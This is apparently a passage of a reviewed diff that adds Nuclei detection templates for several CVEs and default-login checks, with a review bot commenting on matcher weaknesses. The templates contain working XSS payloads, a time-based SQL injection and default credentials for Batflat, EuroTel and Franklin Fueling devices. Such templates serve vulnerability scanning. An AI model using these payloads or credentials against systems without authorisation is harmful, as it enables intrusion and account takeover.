- https://cxsecurity.com/ascii/WLB-2023080015
- https://nvd.nist.gov/vuln/detail/CVE-2023-4115
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4115
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Enquiry summary", "><script>alert(document.domain)</script>")'
condition: and
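
Review bot: the description is the same generic, ungrammatical XSS sentence used for CVE-2023-4112 and does not mention the product or the index parameter that the request injects into. The name says "Cleaning Business 1.0" while the cpe is cleaning_business_software; align the product name. Tags phpjabber,jabber should be phpjabbers.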

View File

@ -0,0 +1,38 @@
id: CVE-2023-4116
info:
name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.
reference:
- https://www.exploitalert.com/view-details.html?id=39746
- https://cxsecurity.com/ascii/WLB-2023080016
- http://packetstormsecurity.com/files/173937/PHPJabbers-Taxi-Booking-2.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4116
- https://vuldb.com/?ctiid.235963
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4116
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHP Jabbers.com"
tags: cve,cve2023,xss,phpjabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Passengers", "Drop-off address", "><script>alert(document.domain)</script>")'
condition: and
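
Review bot: in reference, the packetstormsecurity.com link is http:// while every other reference in this template is https://; switch it to https. No change needed on the matcher: it requires the unencoded "><script> breakout together with two page strings, so an HTML-escaped reflection does not match.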

View File

@ -0,0 +1,44 @@
id: CVE-2023-4148
info:
name: Ditty < 3.1.25 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 3.1.25
reference:
- https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d
- https://nvd.nist.gov/vuln/detail/CVE-2023-4148
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2023-4148
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/ditty-news-ticker/"
tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"><script>alert(/XSS/)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(/XSS/)</script>") && contains(body_2, "ditty")'
- 'contains(content_type_2, "text/html")'
condition: and
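
Review bot: the second DSL line, contains(body_2, "<script>alert(/XSS/)</script>") && contains(body_2, "ditty"), is weaker than it looks. The string "ditty" is part of the request URL itself (post_type=ditty&page=ditty_export), so any page that reflects the URL satisfies both halves, and the payload check omits the leading "> that the attribute context in the description depends on. Match the full "><script>alert(/XSS/)</script> plus a string that only the Ditty export page renders. Nothing checks that the login in request 1 succeeded, and the tags list has "authenticated" but no "xss".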

View File

@ -0,0 +1,34 @@
id: CVE-2023-41538
info:
name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0
- https://nvd.nist.gov/vuln/detail/CVE-2023-41538
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-41538
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "New Question", "><script>alert(document.domain)</script>")'
condition: and
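
Review bot: the keyword value in path mixes encodings: the quote is sent as %22 but the angle brackets are raw (%22><script>...). The CVE-2023-4115 and CVE-2023-4116 templates in this commit encode the whole payload (%22%3E%3Cscript%3E...%3C/script%3E); do the same here so the request line is well-formed regardless of the client. The tags "phpjabber,jabber" also differ from the "phpjabbers" tag used in CVE-2023-4116.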

View File

@ -0,0 +1,34 @@
id: CVE-2023-4168
info:
name: Adlisting Classified Ads 2.14.0 - Information Disclosure
author: r3Y3r53
severity: high
description: |
Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.
reference:
- https://www.exploit-db.com/exploits/51667
- https://templatecookie.com/demo/adlisting-classified-ads-script
- https://nvd.nist.gov/vuln/detail/CVE-2023-4168
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-4168
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: cve,cve2023,adlisting,exposure
http:
- method: GET
path:
- "{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "google_map_key", "api_key", "auth_domain")'
condition: and
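
Review bot: the description says the keys leak in the body of redirect responses, but the matcher requires status_code == 200 and the request sets no redirect handling, so the template and its description disagree about which response carries the data. State which response is meant and match that status. The three matched words are key names only (google_map_key, api_key, auth_domain); a regex that requires a non-empty value after the name would avoid reporting pages where the keys are present but blank. The path also repeats the lat, long and keyword parameters.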

View File

@ -0,0 +1,43 @@
id: CVE-2023-4547
info:
name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
reference:
- https://spa-cart.com
- https://cxsecurity.com/ascii/WLB-2023080090
- https://nvd.nist.gov/vuln/detail/CVE-2023-4547
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 3.5
cve-id: CVE-2023-4547
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,spa-cart,unauth,xss
http:
- method: GET
path:
- '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '100-1331"><script>alert(document.cookie)</script>'
- '<table class="products-nav">'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
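
Review bot: in classification, cvss-score: 3.5 does not match the vector on the line above it; CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H scores 8.8. Recheck both values against the NVD entry listed in reference. The PR:L in the vector also conflicts with the "unauth" tag. In metadata, verified is the string "true" where the other templates use a boolean, and max-request is missing.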

View File

@ -0,0 +1,36 @@
id: CVE-2023-4974
info:
name: Academy LMS 6.2 - SQL Injection
author: theamanrawat
severity: medium
description: |
A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://demo.creativeitem.com/academy/
- https://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2023-4974
cwe-id: CWE-89
metadata:
verified: true
shodan-query: html:"Academy LMS"
tags: cve,cve2023,sqli,academy,lms
http:
- raw:
- |
@timeout: 20s
GET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration>=7
- status_code == 500
- contains(body, "Courses</span>")
condition: and
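
Review bot: duration>=7 on a single request carrying SLEEP(7) will also fire on a host that is simply slow, and the 20s timeout leaves room for that. Add a baseline request or a second request with a different delay and compare the durations. Requiring status_code == 500 together with "Courses</span>" in the body is unusual enough to deserve a comment in the template confirming that this is what the affected version returns. The description names /academy/tutor/filter while the request goes to /tutor/filter, max-request is missing from metadata, and the DSL entries are unquoted, unlike the other templates in this commit.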

View File

@ -0,0 +1,36 @@
id: CVE-2023-5244
info:
name: Microweber < V.2.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.
reference:
- https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470/
- https://vuldb.com/?id.240778
- https://nvd.nist.gov/vuln/detail/CVE-2023-5244
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2023-5244
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:780351152
tags: cve,cve2023,xss,microweber
http:
- method: GET
path:
- "{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "alert(document.domain)", "microweber")'
condition: and
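
Review bot: the third DSL line matches only "alert(document.domain)" and "microweber", which does not show that the value left the JavaScript string it was placed in. A version that escapes or encodes the leading quote would still reflect alert(document.domain) and be reported. Include the breakout sequence from the request in the matched string, for example ';});alert(document.domain); so that only an unescaped reflection matches.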

View File

@ -0,0 +1,41 @@
id: batflat-default-login
info:
name: Batflat CMS - Default Login
author: r3Y3r53
severity: high
description: |
Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
reference:
- https://www.exploitalert.com/view-details.html?id=34749
- https://cxsecurity.com/issue/WLB-2020010100
metadata:
google-query: intext:"Powered by Batflat."
verified: true
tags: default-login,batflat
http:
- raw:
- |
POST /admin/ HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&login=
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Batflat - Dashboard")'
condition: and
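
Review bot: the raw request line is "POST /admin/ HTTP/2" while the other raw requests shown in this commit use HTTP/1.1; unless the target requires it, use HTTP/1.1 for consistency. metadata has no max-request. attack: pitchfork with a single username and a single password adds nothing over plain values. The matcher relies on host-redirects to reach a page containing "Batflat - Dashboard"; a short comment saying so would help later maintainers.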

View File

@ -0,0 +1,46 @@
id: etl3100-default-login
info:
name: EuroTel ETL3100 - Default Login
author: r3Y3r53
severity: high
description: |
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
- https://www.exploit-db.com/exploits/51684
metadata:
max-request: 2
verified: true
shodan-query: html:"ETL3100"
fofa-query: body="ETL3100"
tags: misconfig,default-login,eurotel
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login
- |
GET /exciter.php HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- user
- operator
password:
- etl3100rt1234
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")'
condition: and
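
Review bot: attack: pitchfork pairs payloads by position, but username has two entries (user, operator) and password has one, so "operator" has no password to be paired with. Either list etl3100rt1234 twice or use clusterbomb so that both accounts are checked, and make sure max-request reflects the resulting request count. The matcher checks only status_code_2 and body_2; adding contains(content_type_2, "text/html") would bring it in line with the other templates.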

View File

@ -0,0 +1,42 @@
id: franklin-fueling-default-login
info:
name: Franklin Fueling System Default Login - Detect
author: r3Y3r53
severity: high
description: |
A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
reference:
- https://www.exploitalert.com/view-details.html?id=39466
metadata:
google-query: inurl:"relay_status.html"
verified: true
max-request: 1
tags: default-login,franklin
http:
- raw:
- |
POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
attack: pitchfork
payloads:
username:
- roleAdmin
- roleUser
- roleGuest
password:
- admin
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
condition: and
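
Review bot: the last DSL line looks for roleAdmin, roleUser or roleGuest in the body, but the same string is sent in the request as ROLE="{{username}}", so a response that only echoes the requested role, a rejection included, would match. Match on whatever the response uses to signal that the role check passed. pitchfork is given three usernames and one password, so only the first role is paired with "admin"; repeat the password or use clusterbomb. The /21408623/ segment in the request path is hard-coded; confirm that it is the same on every installation. The description is generic text about default passwords and never names the product.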

Some files were not shown because too many files have changed in this diff